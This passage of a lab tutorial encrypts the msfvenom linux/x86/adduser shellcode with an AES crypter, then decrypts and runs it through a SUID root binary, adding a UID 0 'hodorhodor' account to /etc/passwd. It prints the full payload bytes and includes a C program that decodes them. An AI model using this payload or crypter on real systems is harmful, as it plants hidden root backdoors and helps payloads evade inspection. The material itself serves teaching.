So what's the fun in only starting shells when you can do something else as well? Let's try something different: use msfvenom to generate a raw payload as the unencrypted input for the encrypter, then feed the encrypted payload to the decrypter and try to run it.
We'll be using the linux/x86/adduser payload, which appends a new UID 0 account to /etc/passwd and therefore needs root or SUID root privileges to do anything.
Create payload
$ msfvenom -p linux/x86/adduser user=hodorhodor pass=hodorhodor -f raw -o adduser_hodorhodor
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes
Saved as: adduser_hodorhodor
$ xxd adduser_hodorhodor
0000000: 31c9 89cb 6a46 58cd 806a 0558 31c9 5168 1...jFX..j.X1.Qh
0000010: 7373 7764 682f 2f70 6168 2f65 7463 89e3 sswdh//pah/etc..
0000020: 41b5 04cd 8093 e828 0000 0068 6f64 6f72 A......(...hodor
0000030: 686f 646f 723a 417a 6d75 5a72 6f73 426a hodor:AzmuZrosBj
0000040: 5259 553a 303a 303a 3a2f 3a2f 6269 6e2f RYU:0:0::/:/bin/
0000050: 7368 0a59 8b51 fc6a 0458 cd80 6a01 58cd sh.Y.Q.j.X..j.X.
0000060: 80 .
Encrypt payload
I’ve encrypted the payload with the string “ISITMEYOURELOOKINGFOR”.
$ ./aes-128-cbc_enc adduser_hodorhodor
Enter password to encrypt:
ORIGINAL:
Oneliner:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3\x41\xB5\x04\xCD\x80\x93\xE8\x28";
16-byte newline delimiter:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68"\
"\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3"\
"\x41\xB5\x04\xCD\x80\x93\xE8\x28";
ENCRYPTED:
Oneliner:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";
16-byte newline delimiter:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD"\
"\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3"\
"\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD"\
"\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B"\
"\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85"\
"\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35"\
"\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";
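Two things are worth checking here before handing this payload to a SUID root decrypter, and the added C program below (my own example, not the crypter code from this page) does both. First, it embeds the 97 raw bytes from the xxd dump above with the decoded instructions as comments, and pulls out the passwd record the shellcode appends by following the call-over-data trick the payload uses (the call's rel32 equals the record length, and the record sits right after the call), so you can see what the payload writes without running it as root. Second, it explains why the ORIGINAL dump above shows only 40 bytes while the ENCRYPTED output is 112 bytes: offset 0x28 of the payload is the first 0x00 byte (the second byte of that rel32), which is exactly where a strlen()- or %s-based hex printer stops, whereas any padding scheme that rounds up to whole AES blocks turns 97 bytes into 112 (and 40 into 48), so the encrypter itself did process the full payload. The helper names (dump_lines, extract_record, record_uid, adduser_record) are mine, and pkcs7_padded_len() assumes PKCS#7 padding, which the page does not state.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Raw linux/x86/adduser payload, copied byte for byte from the xxd dump
 * above (97 bytes); the comments decode the instructions. */
static const unsigned char adduser_sc[] = {
    0x31,0xc9,0x89,0xcb,                  /* xor ecx,ecx ; mov ebx,ecx                        */
    0x6a,0x46,0x58,0xcd,0x80,             /* push 70 ; pop eax ; int 0x80 -> setreuid(0,0)    */
    0x6a,0x05,0x58,0x31,0xc9,0x51,        /* push 5 ; pop eax (open) ; xor ecx,ecx ; push ecx */
    0x68,0x73,0x73,0x77,0x64,             /* push "sswd"                                      */
    0x68,0x2f,0x2f,0x70,0x61,             /* push "//pa"                                      */
    0x68,0x2f,0x65,0x74,0x63,0x89,0xe3,   /* push "/etc" ; mov ebx,esp -> "/etc//passwd"      */
    0x41,0xb5,0x04,0xcd,0x80,0x93,        /* inc ecx ; mov ch,4 (O_WRONLY|O_APPEND) ; int 0x80 ; xchg eax,ebx */
    0xe8,0x28,0x00,0x00,0x00,             /* call +0x28: pushes the address of the record     */
    'h','o','d','o','r','h','o','d','o','r',':',
    'A','z','m','u','Z','r','o','s','B','j','R','Y','U',
    ':','0',':','0',':',':','/',':','/','b','i','n','/','s','h','\n',
    0x59,0x8b,0x51,0xfc,                  /* pop ecx ; mov edx,[ecx-4] (the call's imm32 = 40)*/
    0x6a,0x04,0x58,0xcd,0x80,             /* write(fd, record, 40)                            */
    0x6a,0x01,0x58,0xcd,0x80              /* exit                                             */
};
#define SC_LEN (sizeof adduser_sc)        /* 97 */
static char record_buf[64];               /* filled by adduser_record() */

/* A NUL-terminated view of the buffer stops at the first 0x00, which is the
 * second byte of the call's rel32 at offset 0x28: strlen() reports 40. */
size_t strlen_view(void) { return strlen((const char *)adduser_sc); }

/* Ciphertext length AES-CBC with PKCS#7 padding (assumed) produces for n
 * plaintext bytes: at least one padding byte, rounded up to a full block. */
size_t pkcs7_padded_len(size_t n) { return (n / 16 + 1) * 16; }

/* Print buf in the "16-byte newline delimiter" style used on this page, with
 * an explicit length instead of strlen(). Returns the number of lines. */
size_t dump_lines(const unsigned char *buf, size_t n, FILE *out)
{
    size_t lines = 0;
    for (size_t i = 0; i < n; i += 16, lines++) {
        fputc('"', out);
        for (size_t j = i; j < n && j < i + 16; j++)
            fprintf(out, "\\x%02X", buf[j]);
        fputs(i + 16 < n ? "\"\\\n" : "\";\n", out);
    }
    return lines;
}

/* Recover the passwd record the payload appends, without running it: find
 * the call whose rel32 skips the record (rel32 is the record length and the
 * record follows the call). Returns the length, 0 if not found; out gets a
 * NUL-terminated copy. */
size_t extract_record(const unsigned char *sc, size_t n, char *out, size_t outsz)
{
    for (size_t i = 0; i + 5 <= n; i++) {
        if (sc[i] != 0xe8)
            continue;
        uint32_t rel = (uint32_t)sc[i + 1] | (uint32_t)sc[i + 2] << 8 |
                       (uint32_t)sc[i + 3] << 16 | (uint32_t)sc[i + 4] << 24;
        if (rel == 0 || rel > n - (i + 5) || rel >= outsz)
            continue;
        memcpy(out, sc + i + 5, rel);
        out[rel] = '\0';
        return rel;
    }
    return 0;
}

/* Extract the record from adduser_sc into record_buf; returns its length. */
size_t adduser_record(void)
{
    return extract_record(adduser_sc, SC_LEN, record_buf, sizeof record_buf);
}

/* UID field of a "user:hash:uid:gid:..." record, or -1 if it does not parse. */
int record_uid(const char *rec)
{
    unsigned uid;
    return sscanf(rec, "%*[^:]:%*[^:]:%u:", &uid) == 1 ? (int)uid : -1;
}

int main(void)
{
    printf("strlen() sees %zu of %zu bytes; PKCS#7 ciphertext is %zu bytes\n",
           strlen_view(), SC_LEN, pkcs7_padded_len(SC_LEN));
    if (adduser_record())
        printf("record (uid %d): %s", record_uid(record_buf), record_buf);
    dump_lines(adduser_sc, SC_LEN, stdout);
    return 0;
}
```

Run it and the record comes out as the exact line that later shows up at the bottom of /etc/passwd, with UID 0; the dump is 7 lines because the length is passed explicitly, where the 3-line ORIGINAL dump above is what a strlen()-bounded printer produces for the same buffer. The general lesson for a crypter that handles arbitrary shellcode: carry the length alongside the buffer everywhere (read, encrypt, print, mmap, jump), since raw x86 shellcode with a call, a rel32 or a pushed zero routinely contains NUL bytes.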
Compile and execute decrypter
The decrypter binary is made SUID root because the payload starts with setreuid(0,0) and then appends to /etc/passwd, which only root may write. Note that chmod +s sets both the setuid and the setgid bit, and the resulting mode below (-rwsrwsr-x) is group-writable; that is fine for a throwaway lab VM, but anywhere else use chmod 4755 so that only the owner can modify a binary that runs as root.
$ vim hodor-decrypt-run_adduser.c
$ ../../compile_crypter.sh hodor-decrypt-run_adduser
[+] Compiling ...
[+] Done!
$ sudo chown root hodor-decrypt-run_adduser
$ sudo chmod +s hodor-decrypt-run_adduser
$ ls -l hodor-decrypt-run_adduser
-rwsrwsr-x 1 root vbox 7672 Jan 3 23:12 hodor-decrypt-run_adduser
$ ./hodor-decrypt-run_adduser
Enter password to decrypt:
ENCRYPTED:
Oneliner:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";
16-byte newline delimiter:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD"\
"\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3"\
"\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD"\
"\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B"\
"\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85"\
"\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35"\
"\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";
DECRYPTED:
Oneliner:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3\x41\xB5\x04\xCD\x80\x93\xE8\x28";
16-byte newline delimiter:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68"\
"\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3"\
"\x41\xB5\x04\xCD\x80\x93\xE8\x28";
Running shellcode...
$
Hmm, it seems like nothing happened, right? The payload writes nothing to the terminal, so let's check /etc/passwd.
$ cat /etc/passwd
...<SNIP>...
postgres:x:116:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
guest-BoWy7X:x:117:126:Guest,,,:/tmp/guest-BoWy7X:/bin/bash
guest-KJihxL:x:118:127:Guest,,,:/tmp/guest-KJihxL:/bin/bash
vbox:x:1000:1000:,,,:/home/vbox:/bin/bash
guest-aKHocy:x:119:128:Guest,,,:/tmp/guest-aKHocy:/bin/bash
hodorhodor:AzmuZrosBjRYU:0:0::/:/bin/sh
It works! The last line is the record the shellcode appended: user hodorhodor with a 13-character traditional crypt(3) hash of the password, UID 0 and GID 0, home directory / and shell /bin/sh, in other words a second root account. Remove that line from /etc/passwd once you are done with the lab.